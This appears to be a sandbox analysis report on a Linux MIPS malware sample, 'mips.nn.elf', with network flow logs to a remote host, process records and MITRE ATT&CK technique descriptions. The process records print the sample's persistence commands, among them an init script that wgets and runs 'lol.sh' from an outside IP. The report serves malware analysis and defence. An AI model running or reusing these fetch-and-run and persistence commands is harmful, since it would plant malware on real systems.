Dec 27, 2024 09:20:34.585437059 CET	38242	51472	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:34.585552931 CET	51472	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:34.915178061 CET	51474	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:35.034809113 CET	38242	51474	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:35.034976006 CET	51474	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:35.035054922 CET	51474	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:35.154607058 CET	38242	51474	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:35.540755033 CET	51474	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:35.704474926 CET	38242	51474	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:36.255373955 CET	38242	51474	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:36.255481958 CET	51474	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:36.542524099 CET	51476	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:36.662105083 CET	38242	51476	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:36.662225008 CET	51476	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:36.662326097 CET	51476	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:36.781863928 CET	38242	51476	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:37.168735027 CET	51476	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:37.332405090 CET	38242	51476	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:37.806133986 CET	38242	51476	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:37.806282043 CET	51476	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:38.170614004 CET	51478	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:38.290323019 CET	38242	51478	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:38.290497065 CET	51478	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:38.290600061 CET	51478	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:38.410178900 CET	38242	51478	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:38.796545029 CET	51478	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:38.956186056 CET	38242	51478	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:39.453387022 CET	38242	51478	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:39.453531027 CET	51478	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:39.797964096 CET	51480	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:39.917581081 CET	38242	51480	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:39.917716026 CET	51480	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:39.917761087 CET	51480	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:40.037276030 CET	38242	51480	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:40.424613953 CET	51480	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:40.667157888 CET	38242	51480	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:41.174174070 CET	38242	51480	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:41.174257040 CET	51480	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:41.426218987 CET	51482	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:41.545880079 CET	38242	51482	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:41.546001911 CET	51482	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:41.546072006 CET	51482	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:41.666400909 CET	38242	51482	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:42.051578999 CET	51482	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:42.216212034 CET	38242	51482	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:42.745599031 CET	38242	51482	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:42.745799065 CET	51482	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:43.053215981 CET	51484	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:43.172770977 CET	38242	51484	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:43.172991991 CET	51484	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:43.172992945 CET	51484	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:43.292457104 CET	38242	51484	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:43.678558111 CET	51484	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:43.844852924 CET	38242	51484	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:44.288522959 CET	38242	51484	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:44.288758993 CET	51484	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:44.680304050 CET	51486	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:44.799755096 CET	38242	51486	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:44.799860001 CET	51486	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:44.799942017 CET	51486	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:44.919575930 CET	38242	51486	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:45.305550098 CET	51486	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:45.695537090 CET	51486	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:45.946835995 CET	38242	51486	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:45.947814941 CET	38242	51486	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:45.958472967 CET	38242	51486	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:45.958561897 CET	51486	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:46.307028055 CET	51488	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:46.426568985 CET	38242	51488	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:46.426686049 CET	51488	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:46.426764965 CET	51488	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:46.702135086 CET	38242	51488	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:46.933821917 CET	51488	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:47.096133947 CET	38242	51488	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:47.703985929 CET	38242	51488	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:47.704096079 CET	51488	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:47.935087919 CET	51490	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:48.054528952 CET	38242	51490	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:48.054610014 CET	51490	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:48.054708004 CET	51490	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:48.174061060 CET	38242	51490	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:48.560291052 CET	51490	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:48.724136114 CET	38242	51490	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:49.182445049 CET	38242	51490	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:49.182562113 CET	51490	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:49.561588049 CET	51492	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:49.681034088 CET	38242	51492	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:49.681101084 CET	51492	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:49.681140900 CET	51492	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:49.800626040 CET	38242	51492	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:50.187674999 CET	51492	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:50.348228931 CET	38242	51492	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:50.927333117 CET	38242	51492	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:50.927418947 CET	51492	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:51.189150095 CET	51494	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:51.308747053 CET	38242	51494	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:51.308845997 CET	51494	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:51.308922052 CET	51494	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:51.428409100 CET	38242	51494	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:51.814264059 CET	51494	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:51.980175018 CET	38242	51494	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:52.500180960 CET	38242	51494	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:52.500286102 CET	51494	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:52.815629959 CET	51496	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:52.936263084 CET	38242	51496	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:52.936628103 CET	51496	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:52.936628103 CET	51496	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:53.142060041 CET	38242	51496	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:53.442047119 CET	51496	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:53.604171991 CET	38242	51496	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:54.147476912 CET	38242	51496	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:54.147671938 CET	51496	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:54.443274975 CET	51498	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:54.562943935 CET	38242	51498	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:54.563072920 CET	51498	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:54.563102007 CET	51498	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:54.682627916 CET	38242	51498	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:55.068636894 CET	51498	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:55.232141018 CET	38242	51498	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:55.737061024 CET	38242	51498	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:55.737220049 CET	51498	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:56.070395947 CET	51500	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:56.189898968 CET	38242	51500	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:56.190145016 CET	51500	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:56.190253019 CET	51500	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:56.309729099 CET	38242	51500	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:56.695436954 CET	51500	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:56.856240034 CET	38242	51500	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:57.372451067 CET	38242	51500	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:57.372638941 CET	51500	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:57.696814060 CET	51502	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:57.816381931 CET	38242	51502	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:57.816473007 CET	51502	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:57.816534996 CET	51502	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:57.936234951 CET	38242	51502	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:58.321017027 CET	51502	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:58.484204054 CET	38242	51502	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:58.971573114 CET	38242	51502	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:58.971718073 CET	51502	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:59.322242022 CET	51504	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:59.441920996 CET	38242	51504	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:59.442209959 CET	51504	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:59.442209959 CET	51504	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:20:59.561935902 CET	38242	51504	94.156.227.234	192.168.2.14
Dec 27, 2024 09:20:59.948509932 CET	51504	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:00.108302116 CET	38242	51504	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:00.576844931 CET	38242	51504	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:00.577099085 CET	51504	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:00.950388908 CET	51506	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:01.069912910 CET	38242	51506	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:01.070038080 CET	51506	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:01.070080996 CET	51506	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:01.189600945 CET	38242	51506	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:01.575047016 CET	51506	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:01.736227989 CET	38242	51506	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:02.285943985 CET	38242	51506	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:02.286017895 CET	51506	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:02.576781034 CET	51508	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:02.696360111 CET	38242	51508	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:02.696490049 CET	51508	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:02.696561098 CET	51508	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:02.816167116 CET	38242	51508	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:03.204142094 CET	51508	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:03.368272066 CET	38242	51508	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:03.815238953 CET	38242	51508	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:03.815388918 CET	51508	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:04.205264091 CET	51510	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:04.324829102 CET	38242	51510	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:04.324958086 CET	51510	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:04.324996948 CET	51510	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:21:04.444655895 CET	38242	51510	94.156.227.234	192.168.2.14
Dec 27, 2024 09:21:04.830286980 CET	51510	38242	192.168.2.14	94.156.227.234

System Behavior

Analysis Process: dash PID: 5475, Parent PID: 3634

General

Start time (UTC):	08:18:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.yYkb9SvdDQ /tmp/tmp.bTDoJNGSKG /tmp/tmp.GLm8ljNFsf
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:18:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.yYkb9SvdDQ /tmp/tmp.bTDoJNGSKG /tmp/tmp.GLm8ljNFsf
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:18:58
Start date (UTC):	27/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	/tmp/mips.nn.elf
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:18:58
Start date (UTC):	27/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/mips.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/tmp/mips.nn.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:18:58
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:18:59
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:19:00
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:19:00
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:19:00
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:19:00
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Source: mips.nn.elf	Virustotal: Detection: 36%			Perma Link
Source: mips.nn.elf	ReversingLabs: Detection: 34%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
